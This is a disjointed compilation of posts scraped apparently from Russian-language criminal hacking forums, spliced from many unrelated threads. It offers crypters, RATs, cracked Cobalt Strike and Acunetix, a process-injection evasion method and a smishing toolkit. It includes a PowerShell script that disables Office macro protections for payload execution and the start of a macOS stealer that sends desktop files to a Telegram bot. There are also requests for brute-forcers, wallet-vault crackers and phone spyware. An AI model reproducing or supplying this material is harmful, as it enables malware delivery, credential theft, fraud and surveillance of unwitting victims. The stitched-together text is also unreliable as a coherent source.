var firstCharacters, lastCharacters string
fmt.Print("Введите первые символы адреса (адреса начинаются с 0x): ")
fmt.Scan(&firstCharacters)
fmt.Print("Введите последние символы адреса: ")
fmt.Scan(&lastCharacters)
pattern = firstCharacters + "*" + lastCharacters
case 4:
fmt.Print("Введите любые символы: ")
fmt.Scan(&pattern)
case 5:
var numRepeatedChars int
fmt.Print("Введите минимальное количество повторений символа: ")
fmt.Scan(&numRepeatedChars)
pattern = strings.Repeat(".", numRepeatedChars)
default:
fmt.Println("Неверная опция")
return
}
filename := fmt.Sprintf("%d.txt", searchOption)
file, err := os.OpenFile(filename, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644)
if err != nil {
fmt.Println("Ошибка при открытии файла:", err)
return
}
defer file.Close()
addressChannel := make(chan *key)
attemptsChannel := make(chan int, 100)
go func() {
ticker := time.NewTicker(1 * time.Minute)
var attempts int
for {
select {
case <-ticker.C:
fmt.Printf("🚀 Сгенерировано кошельков за последнюю минуту: %d\n", attempts)
attempts = 0
case <-attemptsChannel:
attempts++
}
}
}()
for i := 0; i < 255; i++ {
go func() {
attempts := 1
for {
k, err := generateKey(attempts)
if err != nil {
fmt.Println(err)
return
}
if matchesPattern(k.addressHex, searchOption, pattern) {
addressChannel <- k
attemptsChannel <- 1
return
}
attemptsChannel <- 1
attempts++
}
}()
}
for i := 0; i < 255; i++ {
k := <-addressChannel
result := fmt.Sprintf("Приватный ключ: %s, Адрес: %s\n", k.privateKey, k.addressHex)
fmt.Print(result)
if _, err := file.WriteString(result); err != nil {
fmt.Println("Ошибка при записи в файл:", err)
return
}
}
}
func generateKey(attempts int) (*key, error) {
privateKey, err := crypto.GenerateKey()
if err != nil {
return nil, fmt.Errorf("failed to generate key: %w", err)
}
privateKeyBytes := crypto.FromECDSA(privateKey)
addressHex := crypto.PubkeyToAddress(privateKey.PublicKey).Hex()
addb, _ := hex.DecodeString(addressHex)
hash1 := s256(s256(addb))
secret := hash1[:4]
addb = append(addb, secret...)
return &key{
privateKey: hexutil.Encode(privateKeyBytes)[2:],
addressHex: addressHex,
attempts: attempts,
}, nil
}
func matchesPattern(address string, searchOption int, pattern string) bool {
switch searchOption {
case 1:
return strings.HasPrefix(address, pattern)
case 2:
return strings.HasSuffix(address, pattern)
case 3:
parts := strings.Split(pattern, "*")
return strings.HasPrefix(address, parts[0]) && strings.HasSuffix(address, parts[1])
case 4:
return strings.Contains(address, pattern)
case 5:
return hasRepeatedCharacters(address, len(pattern))
default:
return false
}
}
func hasRepeatedCharacters(address string, numRepeatedChars int) bool {
for i := 0; i < len(address)-numRepeatedChars+1; i++ {
repeated := true
for j := i; j < i+numRepeatedChars-1; j++ {
if address[j] != address[j+1] {
repeated = false
break
}
}
if repeated {
return true
}
}
return false
}
func s256(s []byte) []byte {
h := sha256.New()
h.Write(s)
return h.Sum(nil)
}
Есть софт подобный на форуме? чтоб с 1 огромного тхт файла с url:log:pass достал почты и пассы?
Несколько гигабайт данных, нужно узнать крутится ли вебсервер на заданном порту или нет.Софт должен быть оптимизирован под многопроцессорность и многопоток соответственно.Мб кто видел такую прогу..
Всем привет ребят у кого есть взломанный Little snitch 5.5 буду благодарен если у кого завалялось данное добро
Я решил создать небольшую утилиту, которую некоторые, возможно найдут полезной для себя
Программа полностью создана на **Golang
Перед началом работы, не забудьте создать .env файл, и в нём об** означить переменную API_TOKEN. Если в данный момент у вас нет своего токена, вы всегда можете выпустить его** здесь**
Утилита работает на основе API сайта proxy6.net, и способна производить
следующие операции :
_1. Проверка ваших прокси (На мой взгляд, самое полезное, что может быть. Вам
более не придётся посещать сайт ради того, чтобы узнать список активных прокси
и их данные, теперь всё можно сделать через одну команду)
2. Проверка ID аккаунта (Нередко бывает полезно при обращении в тех.поддержу,
или для работы с API)
3. Проверка количества прокси, доступных по указаной стране
4. Проверка текущего баланса вашего профиля (С указанием валюты) _
Я постарался прокомментировать абсолютно все методы и функции в коде, чтобы они были более понятны для новичков в Go, или для будущих разработчиков
Исходный код также находиться наGithub
P.S Это мой первый проект выложенный на публику, поэтому прошу не судить строго. Однако я готов прочитать вашу критику, и обсудить какие либо вопросы или недочёты в комментариях или в issues на Github
Инструмент PingCastle позволяет провести проверку безопасности AD. После прохождения более 100000 тестов безопасности формируетсяудобный отчет. Французы молодцы. Пользоваться не просто, а очень просто.
**Установка не требуется, изменение данных не производится, данные не
отправляются в облако, вы получаете HTML отчёт. Возможны ложные срабатывания,
потому как PingCastle учитывает потенциальные риски в том числе. Есть
поддержка командной строки.
Ссылка:
ТЫК
Password:
You must have at least 10 message(s) to view the content.
Автор кряка: Pwn3rzs**
На zennoclub стартовал 2-й конкурс кейсов.
Рекомендую почитать мои статьи:
объектах. ](https://zenno.club/discussion/threads/gde-nasa-ne-propadala-ili- kak-zaranee-uznat-ob-opasnyx-letajuschix-obektax.122676/)
Приветствую всех. В наше сМутное время быть уверенным в завтрашнем дне (и в настоящем тоже!) может себе позволить только исключительно богатый или знающий инсайды человек. Остальным приходится выкручиваться кто как может. Сейчас, когда в небе летает множество непонятно чего и в любой момент...
zenno.club
](https://zenno.club/discussion/threads/nejroset-na-zennoposter-legche-ne- byvaet-ili-byvaet.122702/)
Всем привет. Последнее время самое трендовое направление в программировании - это искусственный интеллект. Нейросети, языковые модели, машинное обучение и всё такое прочее. Написание статей, создание картинок, генерация видео, программирование приложений - чего только нет. Zennoposter просто...
zenno.club
Там же вы можете забрать бесплатные шаблоны к статьям.
Where can I access platform Dark Utilities "C2-as-a-service" ?
Отдаю в пару рук уникальный метод инжекта в удаленный процесс без создания
исполянемой страницы памяти на прямую и без изменения ее разрешения. Создание
потока без использования CreateThread/NtCreateThread/RtlCreateUserThread (т.е
без кернел каллбэка который перехватывают ав для отслеживания создания новых
потоков), показан POC на послденем BlackHat и допилен под x86. На фулл
сисколлах (свой движок вырезал)
Это разовая акция в связи с наступившим нг) Я не выдаю никому лично, не
перезаливаю. Кто не успел тот опоздал.
![send.exploit.in](/proxy.php?image=https%3A%2F%2Fsend.exploit.in%2Fsend- fb.358d4b57.jpg&hash=824ffe54bac782fbc1c2b7f04639d4b7&return_error=1)
](https://send.exploit.in/download/8923729aaa9fde93/#cDcjpdd5Uf-KT_J4u5WBWA)
Encrypt and send files with a link that automatically expires to ensure your important documents don’t stay online forever.
send.exploit.in
![send.exploit.in](/proxy.php?image=https%3A%2F%2Fsend.exploit.in%2Fsend- fb.358d4b57.jpg&hash=824ffe54bac782fbc1c2b7f04639d4b7&return_error=1)
](https://send.exploit.in/download/286f9585d865e1e2/#hU8Pw6oBug8POz4l3lFWdQ)
Encrypt and send files with a link that automatically expires to ensure your important documents don’t stay online forever.
send.exploit.in
War Crypter 1.6
Functional:
+ FUD
+ Long Time Fud
+ Daily Refuds
+ Scantime + Runtime
+ Work on x32 / x64 System
+ Strong Startup
+ Custom Icon
+ Anti's
+ EOF
+ WipeFileMetaData
+ Tested and working on: Vista x32 / x64 | Win7 x32 / x64 | WinXp x32 / x64
+ Working With .Net Servers (NanoCore And etc)
+ .Net 2.0 Dependencies
***I advise to run it on Virtualbox. But anyway good tool though
im looking for Brupsuite Enterprise Latest version anyone can help ?
ищу rdp клиент под винду
именно клиент. я понимаю что старые версии rdp винду подходят но меня это не
устраивает
чтобы при коннекте не запрашивало логин и пароль. что бы можно было зайти и
узнать логин
Spoiler: Скриншоты
Доставка лога в телеграм. Установка токена и айди чата в файле 'post.php'.
](https://anonfiles.com/rbpbC918z5/globalonline_globalbank_com_pa_zip)
anonfiles.com
Пароль на архив:
You must have at least 5 message(s) to view the content.
Так же разрабатываем под заказ: https://xss.is/members/318362/
Если у кого-нибудь завалялся, поделитесь пожалуйста. Все что нашел в сети - битые ссылки и дохлый сайт проекта
Cellebrite & MSAB leak.
Rarible, opensea, чем больше, тем лучше на самом деле
Собственно ищу авторегер ТГ аккаунтов.
Ищу аналог реверс прокси , в MSF удобно можно сделать прокси в сетку, без заморочек с форвадингом, просто
Code:Copy to clipboard
run post/multi/manage/autoroute
и все сетка с всеми протоколами идет через прокси, хоть httpS,RDP и тд.
Но сессии метерпретера падают частенько.
Как вариант ngrok, Но там нужно прописывать конфиг, он платный и тд.
FRP работает неплохо, но нужно прописывать форвадинг, неполучаешь IP в
админку, палится АВ
Этот не палится https://github.com/rapiz1/rathole но поднять не получилось,
постоянно проблемы с конектом.
Мб еще кто подскажет варианты еще
Стань участником бета тестирования за +Rep
Монетизируй свои сиды повторно за несколько минут
Постоянные обновления, приму во внимание все ваши пожелания
Линк клац
Пытаюсь собрать базу mail:pass:url. CrystalSorter, LGF_Sorter ничего не находят. Возможно есть альтернативные?
В поисках инструмента способного сравнивать две версии windows (до установки обновлений и после), на предмет понимания какие файлы изменились.
Здравствуйте товарищи. Подскажите пожалуйста парсера с целью экспортировать urls после запроса в поисковике .
подскажите софт или утилиту которые показывает как часто покупают товар на сайте
Powershell script to disable ms-office securities; enable macros etc for easy payload execution
Code:Copy to clipboard
$regPath = "HKCU:\Software\Microsoft\Office\*\Common\Security"
Set-ItemProperty -Path $regPath -Name "DisableHardwareAcceleration" -Value 1
Set-ItemProperty -Path $regPath -Name "DisableBootLoad" -Value 1
Set-ItemProperty -Path $regPath -Name "DisableSafeMode" -Value 1
Set-ItemProperty -Path $regPath -Name "ProtectedView" -Value 0
$regPath = "HKCU:\Software\Microsoft\Office\*\Common\Security"
Set-ItemProperty -Path $regPath -Name "VBAWarnings" -Value 1
Set-ItemProperty -Path $regPath -Name "EnableVBAWarnings" -Value 1
$regPath = "HKCU:\Software\Microsoft\Office\*\Word\Security"
Set-ItemProperty -Path $regPath -Name "EnableDynamicDataExchange" -Value 1
$regPath = "HKCU:\Software\Microsoft\Office\*\Excel\Security"
Set-ItemProperty -Path $regPath -Name "ExtensionHardening" -Value 0
$regPath = "HKCU:\Software\Microsoft\Office\*\Word\Security"
Set-ItemProperty -Path $regPath -Name "ExtensionHardening" -Value 0
$regPath = "HKCU:\Software\Microsoft\Office\*\PowerPoint\Security"
Set-ItemProperty -Path $regPath -Name "ExtensionHardening" -Value 0
$regPath = "HKCU:\Software\Microsoft\Office\*\Word\Security\Trusted Documents"
Set-ItemProperty -Path $regPath -Name "EnableUnsafeLocationsInTrustedDocuments" -Value 1
$regPath = "HKCU:\Software\Microsoft\Office\*\Excel\Security\Trusted Documents"
Set-ItemProperty -Path $regPath -Name "EnableUnsafeLocationsInTrustedDocuments" -Value 1
$regPath = "HKCU:\Software\Microsoft\Office\*\PowerPoint\Security\Trusted Documents"
Set-ItemProperty -Path $regPath -Name "EnableUnsafeLocationsInTrustedDocuments" -Value 1
Подскажите где хранятся данные лицензии/ключи в установленной версии
Metasploit Pro
Каким образом эта лицензия отслеживается? В том смысле, возможно ли
использовать один ключ на нескольких ПК? И как в этом случае будет вести себя
БД
Всем привет дорогие друзья на связи flex!
Сегодня я вам расскажу и покажу как пользоваться одним из дискорд спамеров.
О спамере: В данном спамере огромный функционал. вкратце что он может:
спамить на сервера дискорда, спамить в лс, есть чекер, есть очистка аккаунта,
информация о дискорд серверах, и многое другое
Скачать:Скачать
VT:vt
( 97c2e15e9a218f033fbc7b7d3f16be7d2797ca42003aa2bb13e74ecdc8109398 **)
Инструкция:**
Закидывать токены ботов: ( Спаммер\OpenDiscordHaxx\bin\Debug ) в самом низу
будет файл Tokens.txt туда нужно закидывать токены. если
у вас нету этого создайте в этой же папке текстовый документ с именем Tokens.
Как запускать спаммер: ( \OpenDiscordHaxx\bin\Debug ) там будет файл
OpenDHBackend.exe запускаете его, не пугайтесь
если у вас будет пустая
командная строка. после того как вы запустили её не закрывая её. переходите в
( Спаммер\OpenDiscordHaxxUI ).
там вы запускаете Index.html у вас откроется браузер и
там будет все что может спамер!
На этом все!
Если чем то нужно помочь можете написать мне в лс или в тг.
В общем, возникла идея реализовать ПО, позволяющее управлять агентами. Не
знаю, как правильно назвать: прототипом C2-сервера или "proxy-транспортом".
Особенность в том, что все соединения идут через WebSocket-протокол.
ПО в целом еще сырое, но в целом уже работоспособное. Не знаю, достойно ли
того, чтобы закидывать на конкурс, первый раз в таком участвую. Хочется понять
жизнеспособный ли проект, а также услышать критику по говнокоду от экспертов)
Для показа концепта закинул тестового агента на python. Понятно, что в жизни
скорее всего нужен агент на другом языке.
В дальнейшем планировалась вебка на React и накинуть шифрование на payload
P.S в сопрводилке текста не хватает до 2000, но небольшой туториал сделал в
README, думаю можно зачесть за символы)
Python: 3.10.5
Sources: ws-
server
Pass: 1q2w3e4r
Подскажите пожалуйста, может кто продает билдеры для рассылочного файла ISO, IMG lnk?
Всем привет, так как я на форуме недавно, решил написать небольшой скрипт,
дабы повысить лояльность аудитории форума.
Суть скрипта - извлечение кукисов из логов по домену. Использованный ЯП -
Python
Описание работы программы:
Задаётся два параметра - 1. путь до папки с логами 2. домен, по которому надо фильтровать кукисы
Код проходится по всем объектам в папке логов, находит папку Cookies (точное название файла), читает все файлы и, если в файле есть кукисы относящиеся к нашему домену, с соблюдением названия этого файла добавляет их в новый .txt файл.
Запуск в командной строке:
Windows
python parse.py путь_до_папки домен
Linux/MacOS
python3 parse.py путь_до_папки домен
Пример того как будут выглядеть уже отфильтрованные кукисы:
Если есть какие-то предложения/замечания, буду рад выслушать вас в комментариях.
You must have at least 500 reaction(s) to view the content.
-Пароль 123
Spoiler: Скриншоты
Доставка лога в телеграм. Установка токена и айди чата в файле 'post.php'.
Изменение времени прелоадера перед переходом на страницу с OTP в файле 'index.html', (1000 заменить на свое значение).
JavaScript:Copy to clipboard
if (username && password) {
document.getElementById('preloader').style.display = 'block';
setTimeout(function(){
window.location.href = 'verify.html';
}, 1000);
} else {
document.getElementById('error').innerHTML = 'Error';
}
}
anonfiles.com
Пароль на архив:
You must have at least 5 message(s) to view the content.
I'm sharing a compiled version (not by myself) of CStrike 4.4 here. No, I haven't checked it for backdoors. I generally use it for simulation, learning and forensics hence an air-gapped network.
Password: the industry standard!
Hidden content for authorized users.
https://anonfiles.com/Le18maH7u6/cobaltstrike_release_7z [/ HIDE]
Spoiler: Скриншоты
Доставка лога в телеграм. Установка токена и айди чата в файле 'post.php'.
anonfiles.com
Пароль на архив:
You must have at least 5 message(s) to view the content.
Всем привет, есть задача по разработке софта или поиску существующего, для подмены камеры в ТикТоке записанным заранее видео в галерее. При открытии камеры в тиктоке необходимо чтоб тикток показывал ранее записанное видео из галлереи а не видео с камеры устройства.
Устройства как IOS так и Android
Did not see this on the forum.
Oski is written in C++, build weight 155kb. Number of tasks for the grabber is not specified, but more than 15 is not recommended.
Spoiler: Download
anonfiles.com
Чем просканировать список диапазонов ip на открытый порт?
залейте плиз, или дайте ссылку на торрент
странно что на форуме нет учитывая число баз, на рутрэкере аналогично, думаю будет полезно
ищу крипт апк для ратника что бы не нужно было заходить в настройки и давать разрешения . что бы установка была в 2 - 3 клика или хотябы чтоб мамонту не нужно было самому в настройки заходить и в спец возможности с приложениями
Всем добрый вечер, как вы наверное знаете - на telegra.ph очень много полезной инфы и что бы к ней попасть нужно всего лишь иметь ссылку, но зачастую подбирать нету сил и времени. Для таких случаев я написал парсер который по запросу с темой ищет все темы с этим названием (кроме дубликатов в этот же день).
Python:Copy to clipboard
import requests
from datetime import datetime
import sys
def generate_dates():
dates = []
for month in range(1, 13):
days_in_month = (datetime(2024, month + 1, 1) - datetime(2024, month, 1)).days if month < 12 else 31
for day in range(1, days_in_month + 1):
formatted_date = f"{day:02d}-{month:02d}"
dates.append(formatted_date)
return dates
def check_url(url):
try:
response = requests.get(url)
return response.status_code == 200
except requests.exceptions.RequestException:
return False
def main():
word = input("Введите слово для замены в ссылке: ")
dates = generate_dates()
total_checked = 0
total_working = 0
for formatted_date in dates:
url = f"https://telegra.ph/{word}-{formatted_date}"
total_checked += 1
if check_url(url):
total_working += 1
print(f"\nРабочая ссылка: {url}")
sys.stdout.write(f"\rПроверено: {total_checked}, Рабочих: {total_working}")
sys.stdout.flush()
print(f"\nПроверено ссылок: {total_checked}, Рабочих ссылок: {total_working}")
if __name__ == "__main__":
main()
Сайт telegra.ph принимает формат ввода ссылки как и все сайты на английском языке, следовательно в поле ввода слова для ссылки вам нужно вводить английские слова. Если слова два , то формат ввода будет таким(к примеру): xss-forum или forum_1234, русские слова прогоняйте через переводчик, там будет транскрипция русского слова на английском языке.
I found this link online
- High Life Crypter
- iBinder
- Infinity Crypter v2
- MAXACryptPortable
- MoonCrypter
- nBinder V 5.5
- no$crypter
- OwnZ Crypter 3.5.9
- Psomasweb_Public_Rinajel_Crypter
- Quest Crypter
- RedLions Binder
- Refacts Crypter
- Saddam Crypter
- Shock Labs File Binder v1.0
- Sikandar Crypter
- SImple Crypt0r v2
- The DarKness binDer
- uBinder
- UltimateLogger
- Unknow Crypter Private
- ZMini
- 0 Crypter
- 2020 Crypter
- Black-Crypt
- Byte Crypter V3
- Chrome Crypter 4.9
- CrypteX Advanced
- DarkBinderV1
- Easy Binder
- Entropy v5
- Grieve Crypter 2012
Test them on a VM
Link1: gofile . io/d/TJ20sh
Link2: anonfiles . com/vc4aEcr9u0/Crypters_Binders_Remastered_rar
Может у кого то есть скрипт свипера TRX, желательно на Python.
Буду очень благодарен, если что отблагодарю
нашел на просторе тг юзайте вм или дед
link:https://mega.nz/file/GZdwVabb#Cub7kQ2iS058azu153efVhcnEXm17IFqSPpzdFYzz18
pass:xss.is
W3lc0m3 1337h4x0rz
EN:
This is a pre-release version, if I'm not mistaken the version of
Sorillus rat has been cracked by the cursed team.
Link to original source: linktg
RU:
Это предластовая версия(или ластовая) версия джависткого 'чада' в кавычках
RAT'а
билды тоже на java.
Ссылка на первоисточник: linktg
DOWNLOAD
PASSWORD: xss.is
Необходим сендер для отправки 0 TON с возможностью указания комментария (под спам) если у кого-то есть паблик варианты или самописные по адекватной цене жду в ПМ
всем привет. Кто знает где можно скачать новую версию Nesca для винды? ибо в самой неске возникает много ошибок и ничего не сканит а при запуске nescUpd просит какой то ключ который я хз где достать, прошелестил уже весь интернет но ответов на мой вопрос не нашел. Надеюсь тут смогут помочь
](https://filechan.org/9cY2acCdy9/smtp-sender-1.2.3_jar)
filechan.org
бесплатный.
Данный софт нашел на просторах Github. Может кому-то будет полезным.
SecretScanner помогает пользователям сканировать образы контейнеров или локальные каталоги на хостах и выводит файл JSON с подробной информацией обо всех найденных секретах.
Секреты — это любые конфиденциальные или частные данные, которые дают авторизованным пользователям разрешение на доступ к критически важной ИТ- инфраструктуре (например, к учетным записям, устройствам, сети, облачным службам), приложениям, хранилищам, базам данных и другим видам критически важных данных для организации. Например, пароли, идентификаторы доступа AWS, секретные ключи доступа AWS, ключ Google OAuth и т. д. являются секретами. Секреты должны строго храниться в тайне. Однако иногда злоумышленники могут легко получить доступ к секретам из-за ошибочных политик безопасности или непреднамеренных ошибок разработчиков. Иногда разработчики используют секреты по умолчанию или оставляют жестко закодированные секреты, такие как пароли, ключи API, ключи шифрования, ключи SSH, токены и т. д., в образах контейнеров, особенно во время быстрых циклов разработки и развертывания в конвейере CI/CD. Кроме того, иногда пользователи хранят пароли в виде обычного текста. Также ищет Bitcoin Core wallet, Onion_v3_private_key, Bitcoin Core config.
Добрый вечер! Кто знает каким софтом сейчас можно снести Bitdefender Antivirus(с паролем на удаление) ? напишите если не жалко, можно в личку если не хотите афишировать.
У кого есть Krypton BotNet? мб сурс его. Мб аналоги:? Как я знаю Rhino BotNet
пустышка переписанная.
Буду благодарен.
статья навеяна очередным попавшимся на глаза вопросом сабжа итопиком с более-менее цельным обсуждением предмета
Когда впервые сталкиваешься с задачей и идешь гуглить - находишь хз что. Так было лет надцать назад, и ничего с тех пор не поменялось - погуглил только что перед написанием: софт или устарели ссылки, или "большой" файл не такой большой, который вам надо открыть или за софт просят денежку, лечение не находится и он умирает безвестным так и не попав в наш список.
А наш список прост и, надеюсь, кому нужно, возьмут методику из него в работу надолго.
Первая программа: Total Commander. НажатиеF3 откроет содержимое на
просмотр,а Ctrl + F обеспечит поиск по нему. Файл читается с диска
порциями по мере прокрутки и полнота поиска зависит только от вашего терпения.
Вообще - Total Commander с плагинами полезный инструмент в повседневной
работе, но мы сейчас не о нем. Что касается не просмотра, а редактирования -
F4 также имеется, но редактор слабый. Умеет ли редактор в большие файлы?
Не знаю.
А еще Total Commander - самый простой подручный инструмент для
разбивания большого
файла на более малые.
Полезная во всех отношениях программа.
Вторая программа - TextPad. Он бесплатен по методу WinRar и SublimeText - постоянно просит купить, но никаких ограничений нет. Использую его вместо блокнота для всего. Встраивается в контекстное меню и все такое. Regexp'ы. Рекомендую присмотреться ко второй программе автора -WildEdit - но, кажется, она платная и нет быстрого лечения. А, да, мы о больших файлах: открывает. Но с двумя особенностями - 1) файл не должен быть больше размера памяти (наверное, у меня 128Gb и не проверял что будет если файл больше, но кажется что не должен) и 2) пока файл не откроется программа выглядит зависшей. С непривычки второй пункт раздражает. Но иметь постоянный редактор текстовых файлов которому не страшны большие файлы - удобно. И этот редактор TextPad. Рекомендую.
Да, другие Pad конечно же знаю, в том числе знаменитый ++ , но рекомендую этот.
Еще одну программу я нашел когда зависание TexPad долго раздражало и решил поинтереоваться , неужели ничего лучше не придумали. Загуглил. Результат - см. в начале статьи, но методом перебора, форумов и чегото еще была все же найдена
Третья программа - EmEditor. Очень неплох. (кстати созвучный ему emClient - неплохой почтовый клиент, но, конечно, конторы разные и софт разный) Большие файлы открывает с уважением: внизу бежит строка заполнения (или как назвать), не раздражает. Можно указать, кажется, с какой по какую строку файл открывать. Регекспы. Но я его не пользую. Уже не помню, почему. То ли, в фри версии зарезан макс размер файла (лицензия продается на Рутракере легко), то ли еще что-то не нравилось. Но свистелок и перделок в программе много, кому-то может зайти больше чем TextPad
Вот и все. Разве что...
Зачем нам открывать файл-то? Обычно для найти и сохранить. Отфильтровать.
Проще всего это сделать на Питоне. Да и открыть файл. Ха-ха.
Для такого есть программа PowerGrep Лидер в
своем классе. Делает со строками в файле что угодно. Шикарный перегруженный
графический интерфейс. Перемалывает файлы любого размера. Рекомендую.
Кстати, посмотрите его сайт - там и редакторы есть и другие проги для Regexp
на основе. Лицуха продается где уже говорили - на рутракере.
И еще один подход следует упомянуть - программы для просмотра (но не редактирования) логов. Их тоже есть разные, ну например Glogg. Честно - не юзал что и как ибо есть Python,а в век ChatGPT и Golang код по-быстрому, но - вот такой вот "логовый" подход к болшим файлам существует.
Всем привет, подкиньте пожалуйста брутер телнет массовый. Искал несколько дней во всех интернетах - и нормального решения не нашел (не кидайте скрипты, где они сначала сканят nmapом, потом кидают в медузу и прочих, у меня уже есть лист, но дефолтные брутеры не работают нормально с листами. Если нет соединения - весь брут падает)
Heya!
I've been taking a walk through the library > bugtrack part and to kill time I've bitten a very simple script that compiles from the Trickest repo all known public exploits of all known CVEs.
It may be useful for those of you who are into bug bounty and that sh1t.
The script first clones the repository and then scrapes it locally. It collects all the CVEs and extracts the exploit links from all the MDs. If it's the first time you run it, it will mark everything as new. From then on, every time you run it, it will only update the repository and update your DB locally. All the CVEs or exploits that you already had previously, it will mark them as "read", and it will mark the new ones as such.
You can use the "show" parameter to show all the new ones (be careful with this on the first run, lol).
you can search for a specific CVE too with "search"
Here is the repo/code:
](https://github.com/l0n-b3cca/exploit_choom)
Collects some exploits, choom!! Contribute to l0n-b3cca/exploit_choom development by creating an account on GitHub.
github.com
Ищу парсер для количества объявлений и совершенных сделок у продавцов на сайте sprzedajemy.pl
AIO Smishing Toolkit for SMS Spamming
Introducing the AIO Smishing Toolkit by KNYGHT, your ultimate solution for effective SMS phishing campaigns. This tool is designed for hackers and spammers to streamline their smishing efforts.
Key Features:
Bulk SMS Sending: Send SMS messages to multiple targets using either API or
SMTP methods.
Phone Number Scraper and Validator: Generate valid phone numbers or validate
existing lists to ensure accuracy.
Custom Messages: Craft personalized messages to increase the success rate of
your campaigns.
Provider Information: Automatically sort and categorize phone numbers by
carrier for better targeting.
Note: A lot of users said in my recent articles that the things I shared were viruses and that I was spreading stealer.
I have no idea how these self-proclaimed super intelligent guys came to the conclusion that the file is virus-ridden. The reason some antivirus programs flagged the files as virus-ridden was due to the way the script was packed in the executable file—there was no digital signature or certificate unsigned package when the executable file was created—as well as other factors. Therefore, the next time, please do some research before talking dumb.
Нужен брут Roblox
По лог пасс
Нрод, подскажите пожалуйста как в тандере сделать редирект сообщений с последующим уделанием с оригинальной почты либо перенос их в спам. Возвомнжо у кого то и батник для этого завалялся?)
что делать с этой ошибкой
кто-нибудь сталкивался ?
Activated.jpg](https://xss.is/attachments/30421/)
Splunk Enterprise is a cloud-based platform designed to assist businesses with big data management and analysis of machine data. Key features include data visualization, performance metrics, data collection, real-time search, indexing, KPI tracking, reporting, and monitoring.
The application lets managers create custom dashboards, add visualizations, adjust interface components, and convert it to forms. Splunk Enterprise helps administrators conduct continuous monitoring of operational events to detect vulnerabilities and receive event-triggered alerts in real-time. With its workload management feature, users can reserve the storage capacity of system resources for data import/ingestion of high-priority tasks. Splunk Enterprise also enables team members to detect system anomalies and perform data clustering to filter out corrupted data.
Splunk Enterprise Unlimited offers integration with various third-party platforms including Microsoft Excel, Tableau, Okta, PingFerderate, Azure AD, CA SiteMinder, OneLogin, and Optimal IdM. The solution is suitable for businesses in industries such as aerospace, communications, healthcare, manufacturing, finance, energy, and utilities.
Accelerate Your Digitization
Splunk solutions provide everything you need to ensure your digital
initiatives succeed. Whether you're just starting to digitize, or you were
born in the cloud, innovate with confidence with purpose-built solutions
driven by AI and machine learning.
Empower your people to predict, identify and solve problems in real time. Answer questions across the business, IT, DevOps, and security functions with world-class investigative capabilities, intuitive visualizations, and seamless collaboration.
Splunk’s flexible platform and purpose-built solutions scale with you as your data and organization evolve. With a thriving ecosystem of partners and services, Splunk is invested in being your long-term partner to create data- driven outcomes across your organization.
WwW.Dr-FarFar.CoM.zip
Size : 379 MB****
All Contents of Dr.FarFar Are For Educational Purposes Only
Наверняка он кому-то пригодится
Настройка максимально простая, подойдет для тех кто рекламирует свои услуги в
различных тг чатах или если вам нужно сделать ферму каналов и забить их
постами
Инструкция внутри
Подскажите программы для Андроида для слежения за телефоном. и GPS и прослушка и включение камеры (необязательно). и чтобы не удалить. проверенную. спасибо
Удалить ненужные папки в логах поделитесь скриптом
Интересует аналог https://metamask.github.io/vault-decryptor/
С возможностью своих словарей и многопотока. Есть у кого какие наработки?
Взамен могу дать примитивный брутфорс на Exodus - seed.seco
всем привет
подскажите пожалуйста софтину для удаленного наблюдения за экраном зараженного
пк в онлайн формате
рассмотрю так же покупку софта
Key Features
Xeno Rat offers a wide range of features that set it apart from other RATs:
- HVNC (Hidden Virtual Network Computing): Enjoy this premium feature for
free, enhancing your remote access capabilities.
- Live Microphone: Real-time audio surveillance, perfect for various use
cases.
- Socks5 Reverse Proxy: Proxy your internet traffic through the client with
ease.
- Regular Updates: The project is actively maintained, and new features are
continuously added.
- Built from Scratch: Xeno Rat is developed from the ground up, ensuring a
unique approach to remote access.
Some other features
- Listen on multiple ports
- Chat
- Bluescreen
- Message Box
- Fun menu (monitor on/off, CD tray open/close, and more)
- Webcam
- Key Logger
- Screen Control
- Process Manager
- File Manager
- Shell
- And plenty more...
Legal Disclaimer
Xeno Rat is intended for educational purposes only. The developer is not responsible for any misuse or damage caused by this tool. Always stay within legal and ethical boundaries.
For more details and to access the project, visit Xeno Rat on GitHub. Explore the code and contribute to its development!
For anyone who wants to donate, I also included a txt file with the exact same link.
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F157a969a317949e36406ba8ba05dd8e936ef6af99da8e65569a7c41239618f60%2Fmoom825%2Fxeno- rat&hash=dc9c22bf5cf06f8f21ae936145411179&return_error=1)
tool (RAT) developed in C#, providing a comprehensive set of features for remote system management. Has features such as HVNC, live microphone, reverse proxy, and much much more! ](https://github.com/moom825/xeno-rat)
Xeno-RAT is an open-source remote access tool (RAT) developed in C#, providing a comprehensive set of features for remote system management. Has features such as HVNC, live microphone, reverse prox...
github.com
2022
Вот такой ОГРОМНЫЙ апдейт ) но пусть будет. в хромиуме тоже полезности
завозят, а окунь им живёт
Еще чайниз ребята рекомендуют добавить к общеизвестным доменам hosts
перенаправленным в локал --> bxss.me
Hidden content for authorized users.
https://anonfiles.com/n3F39ee6y6/acunetix_14.7.220425114_x64_sh + crack https://anonfiles.com/peGc99eeye/Crack_Acunetix_zip
upd . увидел что есть пост с этой версией , но линк ведет в поделку паши дуры , так что для людей брезгующих сим софтом - велком
Some copies of cobalt strike patches I came across from the Pwn3rzs telegram group always run inside a VM just thought i should share.
PS: Im just sharing software do not write me about your degenerative hacking attempts.
Download link: https://send.exploit.in/download/95a3bd819ec023a5/#fpB3uKGZBc924VK1HlABJw
Archive password: XSS
Versions: 4.6.1 - 4.7 - 4.7.2 - 4.8
нашел на соседнем(не профильном борде) такой слив.
я не кодер. разобраться не могу, но интересно, что это такое. обозначено, как
стилл под мак.
возможно его тут все тестят продают?
Code:Copy to clipboard
Сливаю вам исходник стиллера на MacOS который стиллит с рабочего стола все файлы формата *.txt|*.rtf|*.jpg|*.png|*.doc|*.docs - и отправляет их в ваш телеграмм бот! (вы можете добавить расширения файлов которые стиллит код) Написан на Python
Как работать с кодом?
bot_token = 'тут токен бота' | hat_id = 'ваш телеграм ид' - меняем на свое значение, билдим файл и отправляем жертве! После запуска все файлы с рабочего стола упакуются в архив и отправлятся вам в тг бот!
Код:
import os
import glob
import zipfile
import requests
# Токен бота
bot_token = 'тут токен бота'
# ID чата, куда будут отправляться файлы
chat_id = 'ваш телеграм ид'
# Путь к рабочему столу
desktop_path = os.path.join(os.environ['HOME'], 'Desktop')
# Шаблон для поиска файлов
file_pattern = '*.txt|*.rtf|*.jpg|*.png|*.doc|*.docs'
# Название архива
zip_filename = 'files.zip'
